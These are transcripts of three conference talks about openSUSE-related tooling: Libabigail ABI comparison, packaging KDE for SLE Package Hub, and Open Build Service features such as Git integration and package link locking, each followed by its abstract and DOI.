first bundle is obviously a translation unit. So whenever you look at a binary, the binary has debug information, when it has, and those debug information describe things, translation unit per translation unit. And it is inside those translation units that you have declarations and their types. So we represent those translation units in the Abigail model, and we represent what we call ABI corpus, and ABI corpus is the representation of a set of translation units. So basically a shared library, the ABI things, artifacts of a shared library, is represented in Abigail's pick as an ABI corpus. That's how we call it. And once we have ABI corpora, yeah, because the plural of corpus to Latin word is corpora, I was told anyway. So when you have those corpora, you can, well, compare them. And so as usual, we build a model of the diff. If you make a parallel with the GNU-Diff tool, when the GNU-Diff tool computes the difference of two files, what does it do with the difference? It just emits it. If you look at the source code, it's what it does. It sees the different boom, it emits it as a text. It doesn't do anything with that difference. In our case, we build a model of the difference, and we actually build a graph of those differences. So if there is a difference between two structures, for instance, that difference might come from the fact that one of the data members of those two structures changed. So you will have one tree representing the two structures, difference between the two structures, and a child tree note representing the detail of that change, the detail being the change of the data members. Do you understand what I mean? And like that, you have a full graph of the changes in memory. Once we have that, we can categorize the changes. I mean, we can walk the changes and mark them saying, okay, this change is that kind of change because, I don't know, for instance, in C++, you can have a change about, I don't know, private data member becoming public. This is a change. But it might not be the same kind of change as removing a data member. So we will put the first change in a category named private change category, and the second change will be put in another category. So categorizing changes. One of the good things about categorizing changes is that we can see changes that come over and over. In the previous example I showed you, you've seen that there were two functions using the class C, right, function F1 and F2. If you don't remember, I'm telling you again. But then the reports, in the reports you saw the change about F1 only, saying F1 change, blah, blah, blah, and then because of C. And you didn't see the change about F2. Well, F2 changed to because of C. You didn't see it because the tool categorized the changes on F2 as being redundant. And why? Because it's the same C that changed that we've seen before. If we have time, we can go back and I'll show you how to, you know, ABI Dev has an option to show you the redundant changes too if you want to see everything. And we can do this kind of analysis because we keep a model of the changes in memory. We don't just emit those changes as soon as we see them. One thing that is interesting too that I wanted to show but time is moving and then, well, we can come back to that later if we're earlier is what we call suppression specifications. You guys are, you know about Valgrind, right? Yeah. In Valgrind you have suppressions. You know that. It's the central, it's, to me, it's the most, it's the best thing ever in Valgrind, right? You can, you have an error that keeps popping. You know about it but you don't want to see that error again because for you it's noise, right? Suppression specifications. We have the same thing in Babigel actually. So and it's a bit more complicated, well, let's say, you know, evolved than in Valgrind because you can say things that like, you can say things like, don't show me changes about a type which name is Foo. But you can also say, okay, don't show me changes about that type if the change is an addition, a new member, add it at the end of C. Or you can say things like, don't show me changes about function F if F is part of, if F is part of a file named blah, blah, blah. You know, there are many, many different things you can express and of course those things come from users. We're saying, I have this case where, you know, I would like to, you know, okay, can you do something? You know, and we discuss the price and, you know, we end up with something, a new category. So we can do, we do this kind of things. So afterwards we report about the changes and reporting means again, working the graph of diffs and depending on the category of a diff node, report about it or not. If the category says, oh, this node has been suppressed by the user, then you won't report it. Right? If the category says, oh, this is a type diff name change. Sometimes you have changes like that. You have an, I don't know, you have, somewhere you have a type that is an integer and someone renamed that, well, someone defines a type diff saying, you know, that integer's name is now fancy type, for instance. So this is not a real, you know, it's a change, but it's not necessarily harmful. Right? Some folks want to be able to, you know, dismiss, well, suppress those things. So we have a category for those kind of changes too. So the reporting engine knows about categorization and decides to show things depending on that. And of course, for now we only have one kind of text reports. But we could have more, but well, that's what we have. So we've just seen what we can build as an in-memory model. Right? So where do we build that model from? We build it from reading ELF and DWARF. DWARF is the format for debug info in ELF, basically. Those guys like Tolkien's books and well, I guess, but anyway. So in Libabigel, there is a reader component that knows how to read ELF, so it's written in C++. And from that, it builds the Abigail model I was talking to you about earlier in memory. So it does that for shared libraries, object files, and also actually also executable if only if, even if I don't mention that here. Once we have that, once we can read from ELF, build a model, well, we can also write it down in files, obviously, so that people can define snapshots of the ABI of a binary or a package. You have a binary, you don't want to put that into Git. Well, you can extract its ABI and stash that ABI into Git. The format is an XML ad hoc format we came up with and we call that ABI XML. And of course, we can read it back. So this is interesting because once you read it back, well, you build an Abigail model and so it lets you be able to compare, well, I'll talk about that later, you can compare a binary against an ABI XML file because you can read both. We come up with the in-memory model and then we can work on the in-memory model. So which brings me to the tooling around the Abigail. So I'll just skim quickly through some of the tools we have today. So first we have ABI DW which emits, you know, it serializes the ABI representation of a binary to a text file, that's a tool. We have ABI diff that you have seen. So ABI diff can compare two binaries, two ABI XML file or one ABI XML file and one binary, you know, things like that. So you can compare an ABI, a binary against a baseline. There is ABI package diff that compares the ABI of binaries that are inside RPMs or depth files. So that was, yeah, written for someone else and now I maintain it. And the last one that came to the family is Fed ABI package diff. These guys keep coming with longer names. We need to do something about this. I didn't write this one. It's someone else, a colleague who wrote it on his own time, by the way. So this one is interesting. It talks, okay, ABI package diff just so that you have things in mind. It works on RPMs. But when you work on RPMs, the debug info is split. In another, it's in a separate package. So you've seen with ABI diff, when we want to compare two binaries, we just need the two binaries. If you want to compare two packages, you need actually four. Yeah, because you need the two debug info packages. So the command line starts being a bit longer. You can actually need even more in certain cases because ABI, ABIgal sees everything, basically. I mean, there are some changes. I should show you some examples. But there are some changes to some types that some developers don't want to see. Because they say that, oh, this type is private, whatever that means. In EF, there is no such concept as a private type. But what the developer means by that, it means that type was not defined in the public header shipped by the package or whatever. That's what it means by private. But in the binary, we see all the types. We don't care about, so we tell you about all the changes. So people came to me saying, oh, I don't want to see the changes about those types. So there is an option to ABI package diff in which you give it the develop packages in which there are the header files. And so it won't show you changes about types that are not defined in the header files. So six packages. You need six packages just to run ABI package diff. That's a bit too much when you type command lines. So Fed ABI package diff is quite handy because you type it. The name is long, but then afterwards it becomes shorter. You say Fed ABI package diff dash dash from, you say Fedora 10, I don't know, dash dash to Fedora 20, HTTP, the HTTP package. So it will go fetch all the packages, the HTTP packages from Fedora 10 and 20, you know, the debugging for packages, develop packages, whatever, compare them and show you the difference. So that's what it does. So maybe we would need something like this for OBS or, wow, just saying. Anyway, so this is the part of the talk I'm going to change if I go talk to the Debian guys. But anyway, so I'm talking out loud here. It's a chance that it's not recorded, right? So doing this, we faced and we're still facing some interesting challenges. We, well, speed and space matters a lot, a lot more than what people think. When you're dealing with something like Alibaba Gale, you are looking at the entire binary. And usually your compilation tool chain, even your compilation tool chain usually doesn't do that unless you do something called LTO, but we're not, we'll put that aside. Usually your compiler just compiles things file by file, translation unit by translation unit, right? And the linker that sees everything doesn't analyze types, right? So it doesn't see types either. We see all the types of all the translation units of the shell library so that it can be a lot, a lot, especially when you have like big C++, you know, binaries. And this is also due to the fact that the same types get included over and over and over again. Did I forget an over? Okay, over again. This is thanks to the famous hashing clue thing that I love, right? So think about it. We build representation, in memory representation for those types, for all of them. If we have hundreds of thousands of types in memory, that can do a lot. You can end up with gigabytes and gigabytes of memory used just to represent those types. And you need two copies because of course you're comparing two libraries, right? So we need to do something about that. We need to de-doplicate those types. So basically what it means, compiler people have fancy names for easy concept. When you see a type foo, first time, okay, type foo, and then you go to the next translation you need and you see type foo again, well, you shouldn't rebuild an in-memory representation for this foo. You should reuse the first one you saw. De-doplication. But to do that, so it's an easy concept. But then to do that, you need to be fast because how do you know that the second foo is the same one as the first one? It is not because it is named foo that it is necessarily the same as the first one. In C++ normally it should be the same because there is something named the one definition rule, which is a C++ rule saying that if two entities have the same name, then they ought to be the same entity. But then in C, you don't have such thing. Yeah, C, anyway. So in C you can have foo in a file. The same, okay, a different foo in a other file. The two foos are exported, well, used by external functions and they're not the same. So to be able to know that we want, well, we want to de-doplicate things. So we need to know if the second foo is the same as the first one. So we need to compare them. And comparison by construction is an exponential problem. You compare things member-wise and those members have types themselves that are structures that have members that are structures that blah, blah, blah, and then you end up, you know, it's exponential. And seriously, I mean, if you do these things naively, it can take hours to complete just to compare two packages. So we need to use some heuristics to transform the problem into a more linear one so that things can complete quickly. So it's kind of, there are some interesting, you know, graph algorithms underneath. We also need to control, well, to avoid seeing things we don't want to see. And when I say this, when I say we, the we depends on the project. A change, an ABI change for your project might be harmless and that very same change might be harmful for his project. He might want to see those. So we need to give you ways to, you know, yeah, to avoid seeing what you don't want to see. So these are, this is why we came up with suppression specifications, but it goes further. For instance, if you have a file named dot, well, that ends up with dot ABI ignore, ABI ignore in your package, in your RPM file. ABI package will detect that and use it, for instance, as a suppression specification. Right. And think about it, if you build, for instance, an ABI verifier at the distro level, you will need to provide users with this kind of capabilities, provide them with the ability to say, okay, this change is okay. I don't want to see it again in my next runs. And of course, this is a library that we're talking about, not only tools, so it needs more documentation. So basically, all the entry points need to be documented, and we're doing that already, but we need more documentation about the inside and things like that. It needs, and we're doing, I mean, the things that are in this section challenges are things we're doing already, but I wanted to, you know, stress on them so that you guys are aware of that. We need a huge set of banners for regression testing. Elf and dwarf is a very loose format. You can put everything, anything in elf or in dwarf. So unless you test stuff, you don't know what you are expecting or what you're really doing. So we need a lot of tests. So the LeBabieGalTarble is more than 100 megabytes of size. The reason is that we have lots of banners just for testing when you make check. So yeah, and we need even more than that. And now what we're planning to do is to actually use Fed ABI package diff or something else to go actually use the packages in the distros and distro histories to use that as regression testing. For instance, if you compare a package against itself, it should yield the empty set. For instance, just doing that on thousands of packages will be good. So this is really important, just like we test comparlers. So in Fedora, we're using this thing to compare the ABI of new packages that are pushed. So it's been in production since a couple of months. So yeah, basically, we perform an ABI diff of the new package against the previous stable one, and it sends a friendly message to the package maintainer. So the changes are categorized. Now you know what category is, basically, but roughly in this case, it's less detailed than what we can do, basically. But this is what they wanted. If, well, there are certain kinds of changes for which we are sure that they're going to cause a problem. Incompatible ABI changed. For instance, removed symbols, for those, those are flagged as failed, for the build, basically. And the most interesting changes, for instance, the changes I show you about the subtypes of functions, those are flagged as need inspection. If your package, well, so the package maintainer needs to inspect the package in those cases, and otherwise the package is flagged as passed as far as this ABI test is concerned. So it is based on Taskotron. I think you guys know about that. The task name, the task that runs on each package is named ABI check. You can Google that. And it uses ABI package diff to perform those things. It's written in Python. So that's it. At the same time, package maintainers can use Fed ABI package diff, so they don't have to wait until they're submitted their package to try to see ABI changes. And so it is in production. The limitations, you know it. It only works on C and C++ shared libraries today. But, well, tomorrow, if folks doing Rust want support, I mean, if it is Elf, we can support it. We can do some work. And it just runs on a small set, well, small set, several hundred packages of, you know, packages that are in the critical path. They call that. And improvements that we need. So I've just ticked this here. So I'm currently working on supporting, you know, the comparison of Linux kernels. This is, well, it's well underway. The Linux kernel is huge because we're not just comparing VM Linux. We're comparing the union of VM Linux and all the modules. There's a couple of those. And the Linux kernel has its own way of handling Elf. So it's quite interesting. So we need more, you know, better support of C and C++ language construct, mostly C++, you know, the new stuff, lambdas, blah, blah, blah, you know, the new stuff. It keeps coming. It just needs work to keep. Because we basically have, it's like a compiler where we have, you know, you need to parse. There is a front end, which is the dwarf thing, which builds a middle-end representation, which is, you know, the Abigail model, and then, well, the back end is emitting reports. So people will come with better API change categorization requests, saying, ah, this change, you categorize it as harmful and harmless. Please, can you put that in harmful place? And we'll discuss and, you know, we'll see, you know, how we can do that. Some people want additional API change reports. You see here in the reports I show you first, we show the changes, but we also show the impact, you know, what are the functions that are impacted or global variables. Some people just want to see the types that changed and don't care about the functions that were impacted because there are so many types, you know. So it's a valid request. So we would need, well, we can do that. We have all the information to do that. We just need to, you know, emit other kinds of reports for that. Some people want more friendly web reporting. We need work from that. And someone even came with a crazy idea of something web, blah, anyway, you know, you submit two packages and the thing does its thing and shows you web reports, you know. Anyway, so if someone wants to do that, it will be great. But I don't know if, well, maybe I can try and learn some JavaScript. Anyway, so yeah, that's it for me, I guess. Now is the time for question. I'm sorry, but I finished on time. Now you should do the same. You have two minutes. Anyone? What architecture does it support? Only x8664 or so? Well, right now, well, it is known to work on x86, ARM, PowerPC, you know, and even stuff. The right answer is if we have DWARF, if we on ELF, it should work. PowerPC showed that there are some corner cases sometimes, but in theory it should work. Yeah. Another question, does it also catch calling convention changes? This is an interesting question. Right now, no, short answer. But there is a, I have a bugzilla open to support that. Not necessarily calling convention changes, but not necessarily only that, but things that are more subtle than that. For instance, a parameter, for instance, the second parameter of a function, the way that parameter is passed can change from a compiler to another. For instance, you have an LLVM generated binary that passes that parameter on the stack, and GCC will pass that or the other way around in registers, things like that. So the idea is to have, is to be sure that we have that information in DWARF. And if we have that, and I think we have part of it, then we can implement it on our site. Well, if the structure of, in C, in the size of the structure changes, can you somehow detect from the library code whether it is IBA compatible or not? This is a problem when the function fills the whole structure, including the last member and the size is in the public interface, then it could override a data. Okay. To me, so if I understand the question correctly is if the size changes, can we say if that change is compatible or not? Right. That's, well, to answer that question, well, I would say that if that size change impacts another type that uses that type which size changed, then it's ABI incompatible. But then there is not only an impact, the impact is not necessarily only on other types. It can be on code too. You can have code that says size of that structure. So my short answer will be if the size changes, it's bad, period. If it's not bad, then you haven't looked close enough. So yeah, because the question came out over and over. And for instance, if a code says size of, that size of is lost because it's a constant and we don't see that in the generated code anymore. So I don't think we can really be sure that we're doing the complete impact analysis of these kind of things. And I think we would err on the safe side by saying that this is bad period. If you do it, you know that it's potentially bad. Yeah. It's bad. You mentioned that you were looking for ways to identify whether two certain structs are the same and C, which doesn't have to you ODR. Have you thought about building like an MD5 sum of a struct and then comparing that? Oh, well, to us, the problem is solved. I mean, well, it's solved. The question is interesting. If to build an MD5 sum or a sum, you need to walk the structure. Right? What I want to avoid is to walk the structure. Exactly. And that is what we do. That's what I meant by saying that trying to transform the problem from an exponential one to a linear one, this is basically the kind of technique we use. We use some kind of hashing to avoid walking over and over. We just walk once per type, name and kind. Yes. It's just that the hash that we end up using is not, we don't save it. It's just in memory. So I guess, thank you very much.
Libabigail is an infrastructure for semantic analysis of ELF binaries containing C or C++ programs. It powers command line tools like ‘abidiff’, which let users compare ABI changes between two different versions of a given ELF binary by analyzing just the binary and its ancillary debug information. The result of the binary comparison is a kind of hierarchical ‘diff’ which shows changes up to the types of the interfaces that constitute the ABI of an ELF program. This infrastructure allows software distributors (among other actors) to build specific tooling to review and analyze ABI changes that might occur whenever a shared library package is updated. That tooling might even be tailored to automatically prevent packages with unwanted incompatible ABI changes to reach users. This talk intends to present Libabigail, its architecture, its capabilities, its current limits, its associated tools and how it might be used to further build highly tailored ABI verification tooling. The talk will also explore the potential improvement paths that are currently identified, and from the feedback of the audience, explore improvement paths that are not yet identified.
10.5446/54473 (DOI)
So, let's start. I'm going to talk to you about the KD packages for SLEE that we have done for Package Hub. I suppose that you have been in the other Package Hub talks that have been in the conference. But for this time, I'm going to talk only about the KD packages and about the whole process in order to get the KD packages in Package Hub. So, that might be a starting point for you if you want to also collaborate with Package Hub and submit your applications there. It will be maybe an interesting talk for you. So, let's start explaining who am I because I suppose that most of you don't know me. At least I don't know most of you. So, I'm Antlar on IRC, Antonio La Rosa on the real world. I've been a KD developer since 20 years ago. I've been a SUSE user since 98, something like that. At that time, SUSE sent DVDs to all KD developers. So, I started using it at that time. I've been a SLEE user since around 2004. In the previous company I worked for before coming to SUSE, I used the SLEE as a maintainer, as a system administrator and also developed applications for SLEE. And I've been a SUSE developer. I've been working at SUSE for the last four years and also for a bit longer than a year, around the year 2000. And currently, I'm at the SLEE desktop team. So, I work most of the time with GTK applications but also with KD applications on open SUSE. So, how did this project began about making KD packages for SUSE? Mainly, it started as a HACWIC project. I suppose that most of you who have worked in the HACWIC, it also happened to you probably that the first day of the HACWIC, you still don't know what to do. And then, talking with some people, they suggested that maybe it would be a good idea to make KD packages for SLEE. And I thought, let's see, there are KD packages for open SUSE, so it shouldn't be much of a problem. I was wrong, okay? That's a spoiler of the talk. It started in HACWIC 12, to be more precise. If you check the dates, I had to check it. It's around April 2015. So, it's been a while now since I started working on this. But most of the work was actually done by the end of the year, of 2015 and the beginning of 2016. Okay? I worked obviously during the HACWIC, but I was overwhelmed. There was a lot of work to be done, and it was clear that it was not a project to be done in a week after I started. So, in a sense, this project has been kind of a guinea pig for package HACWIC, because we have been testing things before package HACWIC was released. And I suppose it's not wrong to say something like that, okay? So before beginning talking about how this is done, probably I should talk about how KDE is structured into OBS. I guess most of you already know, maybe, so I will probably go faster on this. Basically, we have several projects for cute packages. The main project for that is KDE Qt 5, which is a double project for Qt in factory. And then also we have Qt 5.6, Qt 5.7, and you know, the progression, right? You see the pattern there. Then we also have KDE projects. We have split that into frameworks 5. There's a project, KDE frameworks 5, which includes right now frameworks and Plasma packages. Mix it there. Also, we have KDE frameworks 5 LTS, which is the LTS version of Plasma. And it includes a newer version of frameworks, but not so new as in KDE frameworks 5. Personally, I think that we should also split that, but probably that will happen in the next weeks, months. But right now, frameworks on Plasma are in the same project. And then we have KDE applications, which is basically KDE applications, as the name says, the software, the applications for KDE. Then there's also KDE Extra, which is more applications for KDE that are not part of the KDE applications software compilation. And then we also have kind of an obsolete project, which is KDE Distro Factory, which includes KDE 4 packages, which are still in use. And with a little luck, we will stop using that soon, as soon as possible. Then we also have other projects in OBS for KDE, which are the unstable projects, which have the services to get the packages from JIT directly. These are, as you see, something clear, Qt frameworks, applications, and extra. And they are updated mostly every day. Sometimes even more than once per day. So these are the base for, I can say, Krypton and Argon. Those distributions take the packages from these projects. So with so many projects to take to base our SLE packages from, what should we take? Well, basically, at the beginning, I decided to go with KDE 5.4.3, I think. But then when OpenSUSE was released, then, sorry, not when it was released, but when OpenSUSE was updated, I changed it and used KDE 5.5.5. Basically, I used the DevL projects for Factory, which soon, well, not too soon, but I realized that that was kind of a bad decision. And when I was making the packages for SB2, for SD2 to SLE2, I decided to go and just use directly the packages from LIP, from LIP 42.2. Because the 42.2 packages from KDE, where there was a lot of time invested into those packages, it would be a pity not to use them. So basically, at the beginning, I used these projects as a base. And if we count the packages that are in each of these projects, then we see that there are quite a few packages there in each of the projects. And if we sum them, we see that there are nearly 1,000 packages there. Of course, not all of them are currently in package app. There are many packages that either they don't make sense in SLE, like, for example, Discover or some of those app store applications that use newer package kit dependencies, and which SLE users usually don't want to use app stores for that. There are also not so common applications that don't make sense on enterprise. Also games, for example, I included a few games just in case. And at the end, basically, we put into package app something like 350, 400 packages. So we already know what to base our project on, and then I started building everything, and first problems arising. Some of the libraries that we were using, OBS couldn't resolve the dependencies. I mean, I had a project in which I built, let's say, Qt5, Qt5 base, Qt5 base. And then when I was going to build another application or another library that depended on that, OBS simply said that the dependency was unresolved. And it was in the same project, and this was, what the fuck? It was a kind of a strange situation. Well, it turns out that KDE uses dependencies with capabilities instead of using package names. Not all of them, but in many cases, it uses dependencies like that. And RPM in SLE wasn't creating the provides for those libraries. So the solution was simple once the problem was stated, was known, and only including the CMake RPM macro file from factory into the CMake package in SLE, and it was solved, and we had all the capabilities included into the packages. So we have a problem with packages missing in the CD12. There are many packages that were mainly missing there, the one there, and then there were other packages that were too old. Maybe I should say too stable because they were not updated with respect to factory, of course, but in any case, I needed newer things and I needed things that weren't there. So I learned about BSK the hard way because sincerely, I didn't even knew that was something. And it turns out that packages that are in SLE sometimes are used to build other packages but are not included into the distribution. So that was what's happening there. And fortunately, I got in touch with Adrienne Schrader, with Leonardo Chiquito, and other developers who helped me and moved the applications to OBS so that I could use them around there. So afterwards, well, this I think that has already been explained in other talks, RPM linked complained that many packages that I was building interfere with other packages that were already into SLE. I mean, even if it was only interfering with one package that was used to build another packages but were not released, then it didn't matter. I mean, I couldn't build that package and RPM linked complained and the building of the package stopped. So it's result out I couldn't build new versions of Qt, of course. You have to remember that it's L12, you set Qt 531 and even if SP1, you set 532, which is a very old Qt version. But fortunately, Max, I don't know if you are on here, Max Lynn, back ported a lot of patches from upstream into Qt. He really did a great job and those versions were good enough for us. But there were also other packages like CMake, which was very old, KDLIFT4 was included. I mean, it's not in the distribution but it's in VSK, Likipi, FFMpeg, Mesa, LDM, there were all versions of that, although packages and something had to be done. So as I said, no package in package can have the same name or include a file that is already included in any package in SD. So that might look like a problem for us if we want to create a package, but it actually makes sense for users and we have to think of users. So we have to find a solution that works for us. So the main solution for this is to patch the package in SD and include any feature that we need later from the newer version, okay? To back port things, I should have said that. Sorry. So sometimes, also, it's possible to force RMPM lint to ignore the error and why to list the package so that it could continue. Of course, this is not a long-term solution. This is only a solution in order to continue building and continue working while the real problem was fixed, okay? This was done because if I would have had to stop for every package that had this problem, then I would still be building KD packages. This way, I could continue working with other packages while someone else was fixing these applications. So another problem was the Wayland problem. It turns out KDE at that time required Wayland 1.3, but SD12 only had 1.2. So probably you are wondering now, wait, is it the way to use Wayland? The answer is, of course, no. Okay, but it was used to build other packages, as I said before. So the solution in this case was to patch Wayland and include some quite a few patches from upstream. And yeah, it got there and it will find, so it could continue. Also, some other problem that I have was with Acconadi. I am showing you here a small selection of the problems that we have, but many more. But in this case, for example, Acconadi had a special requirement for SQLite 3, which was some support for unlock-notify interface, which can only be enabled at compile time. So the solution was easy to do, but it was another change that we had to do in SLEE in order to support this. Then Python SIP. Python SIP, as included in the 3.12, which was the version 4.15.4, wasn't enough. And in order to build Python Qt 5 bindings, we needed some features from 4.15. So these are the resources of features that we needed. But basically, I just have to backport all of them. Fortunately, Python SIP is not very used on SLEE, so it was mainly used only to build the Qt 4 bindings. And the Qt 4 bindings are only used by two packages, FFAO Mixer and HPlib in SLEE. So I tested the packages and saw that they worked fine, and we could go on. So we reached a point in which lib42.2 was released. And sorry, it included a Plasma, I think, 5.4 something. And in the maintenance update, it was upgraded to 5.5.5. So we hadn't released anything yet for package app, so I thought, let's upgrade it. Why not? There are many problems that are already fixed. It should be quite more straightforward, right? So the problem was that this update brought new dependencies. And for example, the Wayland problem returned. And this time KD required Wayland 1.7, which is a long lib from 1.2, which one was still provided by SLEE. So, well, SLEE, SP1 included Wayland? No, of course, it didn't. But the solution was to backport even more patches from upstream. At the end, I think I got something like 20-something patches from upstream in order to build everything. So it was quite a lot of work. The problem, by the way, in case you're wondering why KD needs Wayland if KD still doesn't use Wayland even in lib or in factory, the problem is that there, well, not problem, but the thing is that there is a dependency in KWIN on some Wayland libraries that it uses internally to work, even in X11. So the Wayland libraries have to be there. So another problem was the SLEE branding packages, because, as you know, SLEE has a different branding from OpenSUSE. So I could use the Plasma 5 OpenSUSE branding packages. And what I did was to create a new Plasma 5 SLEE branding packages, which were, of course, based on the OpenSUSE ones. But I changed the backgrounds with the standard SLEE backgrounds. I changed the splash screens to include more SUSE logos and these kind of things. So basically we reached to a point in which we could test some things. Okay. And we found out that there were missing binaries. I mean, everything built fine. All the dependencies were there when building, but when the user wanted to install the system, there was some dependencies that weren't available for him, because he's not using OBS, of course. So there were packages in OBS that were not available for his users. For example, that's a small list of them. As you see, it's not only Qt 5 packages, the Qt 5 modules, but also glue, also LMDB, so Flac, even, and some other libraries. In some cases, some of those libraries were available for SLEE desktop, but not for SLEE server. In other cases, some of those packages were available for SLEE server, but not for SLEE desktop. In other cases, they were not available for any of them. And well, it had to be worked on, which also took time. So the KD packages finally arrived for SP1 after more than a year in July last year. And I thought, okay, this time, SP2 won't catch me off guard, and I will be prepared. So together with Max, we upgraded Qt in SP2 to the LTS version to 561, which is a nice upgrade. And it also allowed us to remove many patches that were backported and just use the LTS version, which is easier to maintain. So that's very nice. Also, I got rid of the Wayland problem, and I said, okay, let's upgrade Wayland to 111, and that will solve everything. At least the Wayland problem, not everything. I didn't do this, but it was nice that someone else did. I don't know if you are here. Thank you. Someone else upgraded Cmake to 352. Also, that helped a lot because there were many packages in KDE which were requiring a newer version of Cmake. In some cases, there was a silly dependency that if we removed it, basically, it worked. There was nothing else to be done. Just removed the dependency. But in other cases, it was still what really required. So, as I said, it wouldn't catch me off guard, but I actually did. Because I didn't thought at that time about the problem with the internal API usage of some KDE applications. Some KDE applications and libraries use internal API from Qt because they need to use it. This means that the KDE applications, like an important K-Win, the window manager, or Plasma, just require a specific version of Qt. You cannot upgrade Qt without the recompiling, rebuilding, and reinstalling the KDE applications. So, that was a problem because there were many users using SLE 12 SP1 with the KDE packages, and when they upgraded to SP2, basically, they stopped working. Also, the KDE look changed quite a bit. Many configuration files changed places. They changed the format. The QML files that defined the look also changed a lot. And this means that the open-suitse branding was changed, and I was basically using some script to change the brandings from open-suitse to SLE. And this script stopped working, so this meant a lot of work that had to be done also. And this time, as I said, okay, most of the dependency problems are already solved, actually, in SP2. Okay, thanks. So, just use the lib42.2 packages, as I said before, were much nicer. So, this means that we upgraded in the SP2 change, we upgraded frameworks, we upgraded Plasma. Even during the SP2 maintenance, I upgraded to 586. We upgraded some applications. So, can you use Plasma in SLE? I'm going faster because I've been told that my time is finishing. Okay. So, don't ask for information. Just use it. Okay, just do it. The only thing you have to do is register your SLE system, enable the package have extension and the SDK. Actually, I'm not sure if SDK is actually needed, but it doesn't matter if you enable it. And then do zipper install pattern KDE. Okay, only that. We'll install a whole KDE desktop in your SLE system, which is installing around 450 new packages and around 300 megabytes. Okay. It's quite a few packages, but it's worth it. So, the idea, when you after you install it, if you get this GDM version, this GDM screen, then in the GR box next to signing, you have to click it and then a popup appears where you select Plasma and then log in and you get into with work, of course. You get into your Plasma desktop, which as you see, is very similar to the GNOME desktop in SLE because I try to make it as similar as possible. Will Sdm work? In fact, I talked with Scott a few days ago about that because I thought it didn't, but actually it does. Sorry, it does. I tried it these days in a virtual machine for a SLE desktop and for a SLE server and actually it works quite well. As you see, basically it's the same GDM meaning, the same GDM look. Only you have to change the A2C config display manager and change GDM with Sdm and as you see, the look is very similar. The only known issue is that the shutdown button just looks out from your session. So, the solution is easy. Just do an extra click on your display manager and shut down the system from there. So, there are already KD packages for this package hub. Just use them. This is not the KD issue. There are many dependencies that were included in package hub thanks to this. So, I think and I hope at least that many other projects get easier into package hub thanks to this. And I would like to thank all these people for helping to get the packages into package hub. So, I don't know if we have time for questions. No. Okay. So, thank you.
Submitting more than 400 new packages to Backports This talk will explain how the KDE packages were prepared and submitted to Package Hub so SLE users could enjoy them. Missing dependencies, rpmlint complaining about valid packages, not fully available dependencies, missing branding packages... It wasn't an easy path to travel but it was worth it. This talk will explain the problems found and how they were solved with the hope to make it easier for others to submit their packages to Package Hub.
10.5446/54475 (DOI)
My name is Bjorn Goijken. I'm working for the Build Service team as Rails web developer. And yeah, I will talk about the Build Service and some of the features and try to shed some light of some of the more hidden parts that probably not everyone knows about. So the Build Service builds packages. We have 47,000 users, which doesn't sound that much, but if you consider that it's not something that a normal person would do, packaging is not like a hobby also. It's quite a lot actually. And yeah, we build 200,000 packages each week only for home projects, so only for users. And additional packages probably much more for our distribution for other projects like GNOME and so on. And yeah, it's also, so OBS is also used by a lot of other communities, projects, companies and hosted by themselves for whatever reason, security and so on. So I said you can build packages. It's one of the cool features for all kinds of kinds of architectures. And yeah, you can build it against different distributions so that they run there with the same libraries and so on. And yeah, we have all kinds of package formats, DBN, RPM, you can build images and so on. So that's probably one of the reasons why it's used by so many different people. And obviously there's more, so we also have, or we make it relatively easy to connect packages with users. So you package stuff and then you have your repository, others can use it. We have a request and review system, which we will see a bit more about later, notification system. And yeah, there's a bigger ecosystem around OBS, there's OSC tool, which covers a lot, some cases even more than the web UI, but OBS can do. And for example, there's also the services system that you can facilitate. So I did a quick search in GitHub and around 20 services exist right now. And it's like, yeah, you can write it your own, you can submit it to us. Basically you can, so there are existing ones, which would be like set version, setting the version in the spec file, tarring or recompressing your archive. And there's one thing which I will present now, that's GitHub or Git integration. And yeah, this would be how it looks like. So I will, mouse. Okay. And yeah, so what you need is you define the service that's here, then the URL to the Git repository. And then basically you already there and have this, but of course it's a bit tedious to write this. Yeah, the rule XML by yourself. So what you can also do is you go to the UI, click on remote URL and then you copy some Git repository. Obviously it doesn't have to be Git. And yeah, you copy it here. And then save. And you have your file. Yes, then the service will run and create your CPIO device. It will take some time. There it is. So you spare your time for creating this XML, which is quite nice. And if you want, you can even take it one step further and integrate this by adding a service for GitHub. Let's click here on settings integration service. This will make GitHub always trigger the build service, notify it whenever there is a change in the commit message, a new commit. So that would be like here. You click here. And the rule instruction is written here. It's quite nice. So I will just briefly mention the most important parts you need to token that you create. You can do it by use OSC token, you can create it in general or only a specific token for the project and package. And then you activate it. And that's how you can continuously get new packages whenever there is a change in your GitHub project or Git project, which I think is quite cool. And additionally, you can also set a branch, for example, with revision parameter. And there's even more. You can extract your spec file if you track it in your GitHub repository or you want to use someone else's stuff and they have that. Then you basically just don't have to do anything. It will just build continuously and all you have to do is to add this URL to the OBS UI and click save. Then package branching is probably something everyone knows or most of you. So you can benefit from other people that already built a package. Then you have this link, this link, which basically refers to it and there's a link file which looks like this. This means that whenever this upstream package changes, your package, your link package will change. So if your own packages that you built, that requires this package, yeah, requires this package and this package changes, they will rebuild. If you prevent this, you can lock it by setting the link. So this is the command OSC set link rep. And then you have here the reference to the revision that you actually want to link against. So that's how you lock it. And in addition, you also have, so if once you locked it like here, that's one of our packages, that's our project, one of the packages we need, we linked it. We also set the reference and apparently the other packages changed. So that's how you see it. If you click here, then you see the diff. So you have also an easy way to see what changed, when it changed and then you can consider if you want to update the link with reference. And yeah, so I think that's pretty nice. And apparently, like if you start linking packages that you need, you stack up packages in your project and yeah, you have a lot of stuff that you have to maintain. So in our case, it's quite a lot. That's just a snippet. And we have a monitor page. That's what you see right now, which gives you a nice overview. It's the same page actually, the same project, but it looks a bit different because I didn't filter it. So you can set here different repositories, architectures you want to filter against. And then you click here, which that's a button. So you wouldn't notice, but then it would filter it. So you get a smaller, like I just want to have a certain group of packages do it like this and then, all right, that's a diff. So let's say RubyGams. And that's how RubyGams. Okay, and then you have an overview. So from there, you can of course also look on the different features. If something is unresolved, you would get a popup which shows you and yeah, if you click on the packages, you could end up here. And you see like your failures. You don't really know much about it. You could look into the build log to see the actual error message. If you want to see the history of this package, what changed or when and why you can see it here in the job history for the particular repository and architecture. So you see here are the revisions, you have the reasons why something changed. Source change means that the package itself changed. Meta would mean depending package changed or the project config and new build is in this case, no, no, it's not the first time, but either because it's the first time you create this package and it got built or you trigger it manually. And so it can happen that you look at this and you see, you know, it fails. You can look down and see in which revisions. So maybe it fails for a longer time and then you check the revision. You go to the revisions tab. Wait a bit. And a bit more. Even more in that tab will in some seconds show you a list of all the revisions, the changes 